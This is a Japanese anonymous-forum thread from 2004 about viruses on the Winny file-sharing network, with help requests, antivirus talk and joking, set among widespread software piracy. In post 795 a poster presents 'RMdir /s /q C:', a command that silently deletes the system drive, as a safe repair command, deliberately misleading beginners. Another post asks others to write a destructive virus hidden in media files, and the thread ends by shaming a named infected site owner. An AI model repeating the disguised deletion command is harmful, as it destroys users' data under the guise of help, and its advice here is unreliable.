フォーマットして二度とnyには手を出さないことだな( ´,_ゝ`)プッ
784[名無し]さん(bin+cue).rar:04/12/05 20:05:06 ID:zkQkL/37
>>782
アヒャヒャ(゜▽゜)漏れと一緒だ。>>783の言うとおりにするしかないYO!
785[名無し]さん(bin+cue).rar:04/12/05 20:05:17 ID:k6/v+8x+
>>781
通りすがりですまんが、NYやってる時点で他人に迷惑かけてる可能性をお前は認識していないぞw
786ネトゲ廃人@名無し:04/12/05 21:31:44 ID:il6rJ+iW
(´Д⊂ モウダメポ

http://page.freett.com/vhydev/4444.gif
787ネトゲ廃人@名無し:04/12/05 21:34:47 ID:il6rJ+iW
>>786

この「W32.Pinfi」のウイルスを削除するには、どうすればいいでしょうか・・・
マジメに悩んでます(´;ω;`)ウッ…
788[名無し]さん(bin+cue).rar:04/12/05 21:37:59 ID:3TxpWUKB
789[名無し]さん(bin+cue).rar:04/12/05 21:46:22 ID:ENnDfjoM
感染力はともかく比較的無害なやつじゃん。
こんなので泣いてたら、苺キンタマ仙台のキャリアはどうしろと。(w
790ネトゲ廃人@名無し:04/12/05 22:21:39 ID:il6rJ+iW
>>788

わざわざありがとうございましたm(__ __)m

けど、Norton AntiVirusのソフトが必要なんですね(´・ω・`)ショボーン
791[名無し]さん(bin+cue).rar:04/12/05 22:26:56 ID:H4AmKuEn
nyやってんのにセキュリティソフト入れてないのか?(´д`)
792[名無し]さん(bin+cue).rar:04/12/05 22:38:49 ID:QOkm1KHG
>>790
お前馬鹿だなぁ。nyやってる=犯罪者だろ?
Norton AntiVirus ってnyで検索してみな?
すんげぇ面白いものが引っかかるはずだからw

ってことは思いつかなかったのか?重いっていうならわかるが。
793ネトゲ廃人@名無し:04/12/05 22:54:11 ID:il6rJ+iW
>>792

こりゃ、一本取られました。・゚・(ノД`)

おさわがせしてすみませんm(__ __)m
794[名無し]さん(bin+cue).rar:04/12/05 23:53:43 ID:nEWOHGAS
ここまで反応してもらえていいな
795[名無し]さん(bin+cue).rar:04/12/06 00:25:55 ID:RyYWTstB
>>780
ひでーことすんなよ。
騙されてformat実行するやつが出たらどうする。

DOSコマンドでこのスレに関係ありそうなのは、例えば
「RMdir /s /q C:」
これ。これくらいしかない。C:はシステムの入ってるドライブ名ね。
RecoveryManagerでシステムファイルを修復するコマンド。詳しくはぐぐれ。
これ以外のコマンド(delとかformatとか)はまず間違いなく
ファイルを全部消しちゃおうっていう罠だから気をつけた方がいい。
796[名無し]さん(bin+cue).rar:04/12/06 00:42:46 ID:bQ5aErdN
>>795
厨は、そこまでする知識などないから大丈夫。
797[名無し]さん(bin+cue).rar:04/12/06 00:45:21 ID:y3j2K+hC
mkdir の逆が rmdir
798[名無し]さん(bin+cue).rar:04/12/06 00:54:20 ID:mXAwLiKu
>>795
【WindowsUpdateしてるか】 no
【AntiVirusは】 no
【ちゃんとUpdateしてるか】 no
【スキャンした結果】 してません

こんなふざけたやつは>>780したほうが身の為だ。
799[名無し]さん(bin+cue).rar:04/12/06 00:54:49 ID:3yQJerla
コマンドをぐぐると、そこは雪国だった。
800[名無し]さん(bin+cue).rar:04/12/06 01:20:38 ID:wpMtd/V5
C:\>rmdir/?
ディレクトリを削除します。

RMDIR [/S] [/Q] [ドライブ:]パス
RD [/S] [/Q] [ドライブ:]パス

/S 指定されたディレクトリに加えて、そのディレクトリ内のすべての
ディレクトリとファイルを削除します。ディレクトリ ツリーを削除
するときに使用します。

/Q /S を指定してディレクトリ ツリーを削除するときに、確認の
メッセージを表示しません。(QUIET モード)
801[名無し]さん(bin+cue).rar:04/12/06 12:55:15 ID:e1Cf+6Z6
最近rmdir知った。deltreeがなくなってから不便だった。
802[名無し]さん(bin+cue).rar:04/12/06 14:00:48 ID:v+dl3ylx
>>800
これって、外付けでも使える?
803[名無し]さん(bin+cue).rar:04/12/06 14:22:59 ID:ke6ivlRk
いい加減PC初心者板いけ

くそ、書き込み失敗ばかりになる。
804[名無し]さん(bin+cue).rar:04/12/06 15:25:12 ID:v+dl3ylx
>>802
冗談ですよ。
ごめんなさい。
m(__)m
805[名無し]さん(bin+cue).rar:04/12/06 15:27:13 ID:v+dl3ylx
>>802>>803の間違い。
806[名無し]さん(bin+cue).rar:04/12/06 15:34:02 ID:if18/TdG
m9(^Д^)プギャー
807[名無し]さん(bin+cue).rar:04/12/06 20:09:34 ID:nHPzZUuI
でもPC初心者板よりこっちの方が優しいのも事実。nyは他の板では副流煙扱いなわけさ。
808[名無し]さん(bin+cue).rar:04/12/06 20:31:56 ID:tCkO4OrT
別に優しくなんかないよ
早いとこお引取り願いたいだけ
809[名無し]さん(bin+cue).rar:04/12/06 21:24:15 ID:nk/0JNJp
初心者板ってそんなにひどいのか
810[名無し]さん(bin+cue).rar:04/12/06 21:29:30 ID:fB6PVjYZ
>>795
PC始めて間もない頃にPC初心者板で何か質問したら
それを丁寧に教えられて実行してしまったよ(´;ω;`)
811[名無し]さん(bin+cue).rar:04/12/06 21:29:59 ID:Q+ONlTR1
>809
ひどい
812[名無し]さん(bin+cue).rar:04/12/06 22:55:22 ID:e415hcRJ
いつものようにwinny起動させて放っておいてたら、AVGがsmall.7.AV.exeってのが入って来たって
警告してきたんだけど駆除しようと試みても何故か反応無し。
今のところ特に変わった症状は無いけど気になったからググったりウィルス辞典で探したりしたけど
ヒットしませんがな。OSはXPでSP2です。
入りこんだフォルダはdownフォルダじゃなくてSystem Volume Infomationってフォルダです。
トロイらしいんだけど誰か解決策を教えてくだされ。
813[名無し]さん(bin+cue).rar:04/12/06 23:00:31 ID:i9keBCU5
>>807
nyやってるならそれぐらい自覚しないと
814[名無し]さん(bin+cue).rar:04/12/06 23:07:20 ID:RelnTZKV
>>812
散々既出ググれ
815[名無し]さん(bin+cue).rar:04/12/06 23:11:26 ID:RelnTZKV
訂正>>812
System Volume Informationでググれ

貼っておく
ttp://canon-sol.jp/supp/nd/wndt8001.html
816[名無し]さん(bin+cue).rar:04/12/06 23:16:53 ID:e415hcRJ
>>815
助かったよ。どうもありがとう。
817[名無し]さん(bin+cue).rar:04/12/07 00:59:04 ID:4wjQ0M+X
の satoshi、74歳。
去年まで金無し君だったけど、WinnyとWinMXで
二年でアプリ350ギガバイト貯めた。一度やってみなよ。
落とすだけ落としてアップせずに終了することもできるし、キーワードに「無修正」「動画」とか入れて
あとは放っておけば一晩でHDがエロムービーで一杯になる。
ソフトがほしけりゃネットで落とせばいいだけ。暇つぶしになる。
フォトショップとかMSオフィスとか色々あるのでマジでお勧め。

文句がある奴はここによこせや → [email protected]
818[名無し]さん(bin+cue).rar:04/12/07 01:48:20 ID:zapPE7sD
前にZIPを解凍して出てきた中身みたら、
自分のデスクトップのソフトが詰め込まれたフォルダがあった
んだけどウイルスだったのかな?解凍する前に
スキャンとデリエグゼやったんだけどなにもでなかったんだよね
819[名無し]さん(bin+cue).rar:04/12/07 08:00:11 ID:C4sYlWqB
(・∀・)ニヤニヤ
820[名無し]さん(bin+cue).rar:04/12/07 09:41:19 ID:aY5mkZgJ
winnyで筆王2005インストーラーccdとシリアル回避のファイルを落としたのだけど
インストーラーCDは解凍のためのパスワードを要求されシリアル回避の
レジストリーに書き込む*****.Regファイルはノートンでチェックしようとしたら
スクリプトエラーがでました。
それ以来、windowsXP上でCD・仮想CDを認識しなくなりました。
ドライバを削除してもう一度認識させても使用不可になってしまいます。
システムの復元でもだめでした。

どなたか対処法ぞざいましたら教えてください。

Cdr4_xp.sys
Cdraiw2.sys この2つのファイルがデバイスマネージャーのドライバの詳細で緑のレ点が
付いてません。
821[名無し]さん(bin+cue).rar:04/12/07 10:44:24 ID:zapPE7sD
>>819 なに、やっぱりまずいの?(´Д`;)キンタマっぽい
気はするんだけど、どこも以上が無くて
わからないんだよ(´Д⊂
822[名無し]さん(bin+cue).rar:04/12/07 13:44:15 ID:kHDYBedo
>>820
で、構造解析の結果は?
823[名無し]さん(bin+cue).rar:04/12/07 13:48:56 ID:bSf676lJ
>>821
で、構造解析の結果は?
824[名無し]さん(bin+cue).rar:04/12/07 14:00:38 ID:eM5aVh38
>>823
で、構造解析の結果は?
825[名無し]さん(bin+cue).rar:04/12/07 15:23:08 ID:TbLqtsMo
>>824
で、構造解析の結果は?
826[名無し]さん(bin+cue).rar:04/12/07 15:35:06 ID:PAl0lXQf
>>825
で、構造解析の結果は?
827[名無し]さん(bin+cue).rar:04/12/07 16:18:22 ID:1nZ9n1Xc
>>826
で、構造改革の結果は?
828[名無し]さん(bin+cue).rar:04/12/07 16:19:00 ID:AZwvdeO+
>>827
失敗です
829[名無し]さん(bin+cue).rar:04/12/07 23:08:43 ID:TbLqtsMo
>>828
失敗です
830[名無し]さん(bin+cue).rar:04/12/08 08:29:42 ID:WT41C461
>>829
失敗です
831[名無し]さん(bin+cue).rar:04/12/08 09:46:36 ID:xZVA50Ti
>>830
しょっぱいです。
832[名無し]さん(bin+cue).rar:04/12/08 10:00:58 ID:LbVFuXPt
>>831
おっぱいです。
833[名無し]さん(bin+cue).rar:04/12/08 11:23:57 ID:eNwycELf
   _  ∩
 ( ゚∀゚)彡 おっぱい!おっぱい!
  ⊂彡
834[名無し]さん(bin+cue).rar:04/12/08 11:33:22 ID:lTPptL8a
   _  ∩
 ( ゚∀゚)彡 emac!emac!
  ⊂彡
835[名無し]さん(bin+cue).rar:04/12/08 16:11:06 ID:PPqI7dBq
ジョルジュ長岡
836[名無し]さん(bin+cue).rar:04/12/08 17:58:50 ID:jxorh1lM
平和だねぇ‥‥。
837[名無し]さん(bin+cue).rar:04/12/08 18:14:52 ID:o1tlnK/W
誰かmp3やmpgで凄まじいウィルス作れよ。
昔はWMPの脆弱性ついて飯島愛のmpgファイルでHDあぼんとかあったらしいけど
今はexeや偽装とか一部の奴にしか効果ないやつばっかじゃん。つまんねーよ。
HDあぼんとまでいかなくてもキンタマに似た動作できるやつできねーの?
そんなのできたらまじ祭りだぜ(・∀・)
838[名無し]さん(bin+cue).rar:04/12/08 18:18:42 ID:y1bNgvYu
平和だねぇ‥‥。
839[名無し]さん(bin+cue).rar:04/12/08 18:18:57 ID:M6tlmlNE
DivXならできるんじゃないか?

破損したファイル食ってDivXのDLLが例外出してメディアプレーヤごと落ちることあるじゃん。
840[名無し]さん(bin+cue).rar:04/12/08 18:29:07 ID:o1tlnK/W
>>839
プレイヤーが落ちるだけなんてしょぼすぎ
841[名無し]さん(bin+cue).rar:04/12/08 18:32:53 ID:jxorh1lM
ブレイカーが落ちるなら画期的だが。
842[名無し]さん(bin+cue).rar:04/12/08 18:35:51 ID:O56Cm/im
>>841
それすごいな
843[名無し]さん(bin+cue).rar:04/12/08 18:38:43 ID:M6tlmlNE
例外で落ちるということは、セキュアなコーディングがされていない、ってことを示してるんだよ。
844[名無し]さん(bin+cue).rar:04/12/08 18:38:44 ID:HCfsq/+T
>>840 脆弱性ってのはそういう所にある。
845[名無し]さん(bin+cue).rar:04/12/08 18:47:54 ID:E7BP59AR
>>837
てめーでつくれや
846[名無し]さん(bin+cue).rar:04/12/08 19:06:57 ID:o1tlnK/W
>>843
>>844
(`・∀・´)ほー
なるほどそういうことか!

>>845
俺にそんなことできるわけねーだろヴォケ!
847[名無し]さん(bin+cue).rar:04/12/08 20:05:09 ID:MzKYyQ3k
正直一般人の俺には無理だ  作れや オタク共!
848[名無し]さん(bin+cue).rar:04/12/08 20:16:07 ID:jxorh1lM
ここに来てる時点で、一般人とは程遠いところにいるんだと認めろ。
849[名無し]さん(bin+cue).rar:04/12/08 21:15:15 ID:lTPptL8a
とキモヲタが申しております
850[名無し]さん(bin+cue).rar:04/12/08 21:48:24 ID:92xBYJOE
平和だねぇ‥‥。
851[名無し]さん(bin+cue).rar:04/12/08 21:50:00 ID:NnUuk6Xj
テレビ的には100キロ切ってほしかったなー
852[名無し]さん(bin+cue).rar:04/12/08 22:23:42 ID:3pijoEG+
>>851
誤爆?
853[名無し]さん(bin+cue).rar:04/12/09 01:11:04 ID:Q9X0Tnqj
>>852
誤爆?
854[名無し]さん(bin+cue).rar:04/12/09 01:49:44 ID:BReYHCr3
>>853
誤爆?
855[名無し]さん(bin+cue).rar:04/12/09 02:06:10 ID:IqEevriL
>>854
捕縛?
856[名無し]さん(bin+cue).rar:04/12/09 02:19:18 ID:JMFoDaOg
>>855
束縛?
857[名無し]さん(bin+cue).rar:04/12/09 02:20:36 ID:mL3/c2oW
緊縛?
858[名無し]さん(bin+cue).rar:04/12/09 03:20:09 ID:zjgo71F7
大和田ry
859[名無し]さん(bin+cue).rar:04/12/09 03:21:39 ID:xHwYASLi
甲論乙駁?
860[名無し]さん(bin+cue).rar:04/12/09 10:59:14 ID:Ueon3dht
割れOSをUpdateしてんの?
861[名無し]さん(bin+cue).rar:04/12/09 20:19:28 ID:aAGzpZrq

−−− 再  開 −−−
862[名無し]さん(bin+cue).rar:04/12/09 20:30:08 ID:VuCCb7JB
闘魂チャンス
863[名無し]さん(bin+cue).rar:04/12/09 20:30:14 ID:Q9X0Tnqj
>>861
−−− 再  開 −−−
864[名無し]さん(bin+cue).rar:04/12/09 20:40:56 ID:VuCCb7JB
元気ですかー
865[名無し]さん(bin+cue).rar:04/12/09 20:50:22 ID:7WDBPY/X
結局、アンチウイルスソフトはどれ入れとけばいいんだろ?
866[名無し]さん(bin+cue).rar:04/12/09 20:59:36 ID:6u1w15He
玄人はnoAntiVirus
867[名無し]さん(bin+cue).rar:04/12/09 21:14:42 ID:lGP4RKtI
それ馬鹿なだけだろ
868[名無し]さん(bin+cue).rar:04/12/09 21:24:25 ID:HHJtecKT
ノートン入れてるけど大体の場合は切ってるよ
869[名無し]さん(bin+cue).rar:04/12/09 21:27:15 ID:SsTx/3iU
入れているのに切ってるなんて意味ないじゃん、やはり馬鹿?
870[名無し]さん(bin+cue).rar:04/12/09 21:51:15 ID:vHKUk1Bv
(゚Д゚)
871[名無し]さん(bin+cue).rar:04/12/09 22:17:30 ID:+fMA5QrJ
ノートン良いんだけど、重いしイロイロめんどいから
VB2005にしたよ
872[名無し]さん(bin+cue).rar:04/12/09 22:49:56 ID:JBfLZH+p
うちはVB.NET 2003だな。
2005でまた少し使い勝手が変わるというが
873[名無し]さん(bin+cue).rar:04/12/09 22:53:15 ID:fwlpsf2Y
使ってるPCがショボイからノートン切ってるよ
ファイルをウィルスチェックする時だけノートン先生の出番です
874[名無し]さん(bin+cue).rar:04/12/09 23:04:37 ID:cDQhLiQC
うちも。
875[名無し]さん(bin+cue).rar:04/12/10 01:06:23 ID:/U64JhFO
重いのをわかっててNAV2005を買ってしまった俺は負け組みですか?
876[名無し]さん(bin+cue).rar:04/12/10 01:15:08 ID:06JmuznS
>>875
はい。
877[名無し]さん(bin+cue).rar:04/12/10 01:26:21 ID:ni2NRuUv
>>872
FrameWorkが2.0になったら、またいろいろ問題が起きそうな
悪寒がしながら、言われるままに移行作業してる自分が嫌い。orz
878[名無し]さん(bin+cue).rar:04/12/10 02:32:08 ID:Qlu9UDd2
こんばんは。宜しくお願いいたします。
【使用OS】 XPHome
【WindowsUpdateしてるか】 している
【AntiVirusは】 ウィルスバスター 2004
【ちゃんとUpdateしてるか】 あいている
【スキャンした結果】 
【オンラインスキャンしたならその結果は】 オンラインスキャンしていない
【Winnyのバージョン】 2.0b7.1かと
【Winny歴、総DL量は】 1年ぐらい 100GBぐらいかなぁ
【テンプレを読んだか】 読んだ
【テンプレにある対策を実行したか】 色々してみた。
【症状か具体的に、分かる限りすべて書く】
インターネットの接続が悪く1/10ぐらいの確立でしか、どのHPにも行けない。
起動するたびにウイルスバスターからWORM_SORE.I修復成功とここ二日20回ぐらいでた。
起動するたびにメモ帳が起動され、デスクトップのメモ帳のショートカットやアクセサリから
メモ帳を起動させようとすると見つかりませんと出て起動できない。
WORM_antinny.AとWORM_antinny.Gを手動検索で発見したが踏んでいないと思う。
何にが原因でこのようなことになっているか分かりません。
winnyはフォルダごと削除した。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
・スタートアップ共にデータC:\Program Files\FUJITSU\BtnHnd\BtnHnd.exe
データC:\Program Files\istsvc\istsvc.exe
を発見。ぬるぽともwin.iniに書かれてなかったです。ご教授ください。
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】 様々なウイルスの確認を調べ、HDDまるごとウイルス検索しました。インターネットにつながりにくいので苦労してます。
879[名無し]さん(bin+cue).rar:04/12/10 03:28:15 ID:Fcj5mENR
ここは初心者の質問スレではありません。
880[名無し]さん(bin+cue).rar:04/12/10 04:36:24 ID:wT7h/rxB
スレ違いだとおもうんだが教えてください
エロゲのisoファイルをdaemon使って起動させたらなんか英語のウインドウが立ち上がって
カウントダウンしてんのよ。んでキャンセルのボタンがあるんだがそれにカーソル近づけると
なんかボタンが逃げるんだよ・・・とりあえずウイルスっぽかったからその時点で電源を
落として再起動した。んで今ウイルススキャンしてます。

このウイルスってどんなウイルスかわかります?

881[名無し]さん(bin+cue).rar:04/12/10 04:38:04 ID:iKxS+ZH5
エロゲのタイトルとハッシュ晒せや
882ひみつの文字列さん:2024/08/04(日) 11:41:22 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
883[名無し]さん(bin+cue).rar:04/12/10 05:01:58 ID:/U64JhFO
>>880
常駐してるAVはいなかったのか?
既知のウイルスだったら、そのプログラムを起動して感染なり、ウイルスがコピーされた
時点で反応があるはず。

ただの嫌がらせのプログラムかもよ?
昔と違って最近のウイルス作者は感染に気づきにくくするように作ってるはず。

いかにもウイルスです。とアピールしてくる方がおかしい。という考え方もある。
884[名無し]さん(bin+cue).rar:04/12/10 05:10:55 ID:wT7h/rxB
>>883
ノートンはそのウイルス(?)起動させたときにはなんの反応もなかったかな。

まあただの嫌がらせプログラムならそれでいいんだけどね・・・
たしかに25秒間のカウントダウンとかキャンセルがにげたりするのはいたずらっぽいんだが・・・

それにしても少し軽率だったことを反省orz
885[名無し]さん(bin+cue).rar:04/12/10 05:14:52 ID:wT7h/rxB
スキャンの結果、感染無しでした。
886[名無し]さん(bin+cue).rar:04/12/10 05:17:11 ID:/U64JhFO
>>885
まあ再インスコも面倒だから、しばらく警戒して様子見ってことでいいんじゃない?
精神衛生上良くないなら再インスコでもいいと思うけど。

つか音夢すぎるわ。仮眠とってくるノシ
887[名無し]さん(bin+cue).rar:04/12/10 05:21:07 ID:wT7h/rxB
>>886
夜遅くにいろいろすまんかった。
ありがとな。
おやすみノシ
888[名無し]さん(bin+cue).rar:04/12/10 05:21:42 ID:mn5UQHGS
>>885
それさあカウントダウンで0になると画面暗くなって変な文字でなかったか?
それならウェブサイト回ってる時に踏んだことあるよ
特に問題なかった
889[名無し]さん(bin+cue).rar:04/12/10 05:28:34 ID:wT7h/rxB
>>888
カウントダウン0になる前に電源落としたからちょっとわかんないっす。
さすがに0にする勇気はなかった・・・
890[名無し]さん(bin+cue).rar:04/12/10 06:10:12 ID:ndymUznU
>>882
あきらかに、“日本語_無修正CG差し替え版”ってトコがウサンくせーだろ。
891[名無し]さん(bin+cue).rar:04/12/10 07:20:08 ID:s61dVx9r
>>882
ttp://winny.serveftp.com/nydb/top.php
ここで3つも危険って書かれてるじゃねーか
調べろよ、そんな怪しげなタイトル・・・
892[名無し]さん(bin+cue).rar:04/12/10 08:01:03 ID:j6RzKB+D
>>889
ただのジョークプログラムだよ
HDDをカウントダウン後に消します・・・みたいな事が書いてあって、キャンセルのウインドウが逃げ回るやつ
25秒後には、イッツジョーク・・・みたいなウインドウが出るよ
何故、詳しく知ってるかと言うと


俺も昔、踏んだ事があ(ry
893[名無し]さん(bin+cue).rar:04/12/10 11:42:17 ID:wT7h/rxB
>>890-891
はい。そのとおりですorz
>>892
(・∀・)人(・∀・)

それにしてもたまにエロゲとかやろうとしたらこれだ・・・
いろいろと反省させられた一日でした。
みなさんご迷惑をおかけしました。
894[名無し]さん(bin+cue).rar:04/12/10 13:33:47 ID:ld19fUjA
ダークロウズ&無修正は鬼門だな。
ワシのやったのはホワイターだった(泣)
895[名無し]さん(bin+cue).rar:04/12/10 17:43:09 ID:wPWwgcUD
(・∀・)
896[名無し]さん(bin+cue).rar:04/12/10 20:32:26 ID:FKrQHNWy
【アプリ】Microsoft WindowsXP Professional 認証無 selfboot CloneCD.zip

は安心ファイルですか?
897[名無し]さん(bin+cue).rar:04/12/10 20:34:20 ID:btoIxHj0
>>894
おまえは俺ですか? 泣
898[名無し]さん(bin+cue).rar:04/12/10 21:13:16 ID:e7i+6vrl
>>872 >>877
さりげなく話しに紛れ込んでてワロタ
899[名無し]さん(bin+cue).rar:04/12/10 23:35:31 ID:4/7v6lV3
(・∀・)
900[名無し]さん(bin+cue).rar:04/12/11 01:47:21 ID:guZ3nlWv
ちょっと質問ですが、ウィルスバスターを使っていてたまにウイルスダウン
したときや解凍したときに発見しました!とでますが、もしでなかったら
そのファイルは個別にウイルスチェックしてパスしたのと同じってこと
なんですか?
901[名無し]さん(bin+cue).rar:04/12/11 02:35:52 ID:Gb6Cw55f
ここはトーシロの質問スレじゃねえと(ry
902[名無し]さん(bin+cue).rar:04/12/11 02:39:24 ID:/dIJWdof
>>900
>1 の5行目な。
903[名無し]さん(bin+cue).rar:04/12/11 03:15:30 ID:hN/+tW98
904[名無し]さん(bin+cue).rar:04/12/11 07:28:01 ID:JiPb47rX
近頃は映画にもAntinyが紛れ込むようになったのな。
脳豚先生が発見してくれたが。
感染ファイルはエロゲが大半らしいから関係ないと思ってたよ。
905[名無し]さん(bin+cue).rar:04/12/11 08:30:32 ID:PzyLLFl8
どう反応したものか……
906[名無し]さん(bin+cue).rar:04/12/11 09:00:10 ID:7BfSp+5E
映画にもantinnyって・・・真逆拡張子が.zipやら.rarと言う事では無いだろうな
907[名無し]さん(bin+cue).rar:04/12/11 12:26:47 ID:ktddncmi
だれか、BitdefenderのサイトにAntinnyのサンプルおくって対応してもらえるようにしてください。
908[名無し]さん(bin+cue).rar:04/12/11 12:30:29 ID:EoFeL9CZ
自分でやれ
909[名無し]さん(bin+cue).rar:04/12/11 12:31:31 ID:nZL74KbH
>>907
スレタイトルを百万遍読んでから(ry
910[名無し]さん(bin+cue).rar:04/12/11 19:17:16 ID:pBsOiTwB
>>904を誰か翻訳頼む
911[名無し]さん(bin+cue).rar:04/12/11 19:48:06 ID:+jPb8ANP
>>910
映画でもzipだとぬるぽ

912[名無し]さん(bin+cue).rar:04/12/11 20:51:18 ID:zN1LXJi+
Bitdefenderはantinnyの検出率悪いからやめたほうがいいと思う。
おとなしく他のを使ったほうがいい
913[名無し]さん(bin+cue).rar:04/12/11 21:42:41 ID:AdYWtzE/
ま、ふつーはAVGとか併用する罠。
914[名無し]さん(bin+cue).rar:04/12/11 21:44:36 ID:1t8kXD+g
併用はしないよ
915[名無し]さん(bin+cue).rar:04/12/11 22:33:47 ID:CsPNd8E9
アプリ落としてbitdefenderでひっかからなかったから大丈夫かと思ってたら
avastにひっかかった
916[名無し]さん(bin+cue).rar:04/12/11 23:06:01 ID:M8EOx1f8
>>915
avast!は、ゲームの修正ファイルをウィルス扱いすることもあるから、オンラインスキャンで調べたほうがいい希ガス。
仙台ウイルスに感染した管理人、奈野りゅうのHP ドラゴン・ロアー
http://homepage2.nifty.com/dragon-r/

このサイトはWinnyを使って手に入れた特定のexeファイルをクリックしたときに感染する
ウイルス「仙台ギャラクシーエンジェルス」に感染しエロゲー(やはり割れなのか)や
絵描きツールを使用している自身のデスクトップ画像などをWinny上でバラまいていた。
そこに、優しい2ちゃんねらーが本人サイトの掲示板で教えてあげたところ、それに気づいた
管理人は速攻でその記事を削除。当然謝罪などの声明もナシ。一般常識のかけらもないと思われる。

同じく速攻で消したリンクページ
イラスト・テキスト系
canvas/宮坂みゆ http://www.geocities.co.jp/Playtown-Bingo/2988/
メビ小隊/メビにゃー http://www.hm7.aitai.ne.jp/~ifudodo/
kool spice/冬野 http://www.kdn.gr.jp/~fuyuno/index.htm
茶色の小箱/brown http://www.geocities.co.jp/HeartLand-Oak/4720/
ACOMPRE/こぴーあんへる http://www004.upp.so-net.ne.jp/ibara/
LOVERS・オブ・ロード館/アキラ http://www.geocities.co.jp/Playtown-Yoyo/1512/
俺よりダメな奴に会いに行く/しゃがみ中パンチ(O山プロ代表) http://shagatyu.fc2web.com/
虚無/GM・T http://www.earthdragon.jp/~karla/

卓上ゲーム系
Hex-a-Gram/なお丸 http://www.geocities.co.jp/Playtown-Dice/2787/index.html
F.E.A.R. Online/F.E.A.R. http://www.fear.co.jp/
グループSNEホームページ/グループSNE http://www.groupsne.co.jp/
918[名無し]さん(bin+cue).rar
>>917
(´・∀・`)へぇ〜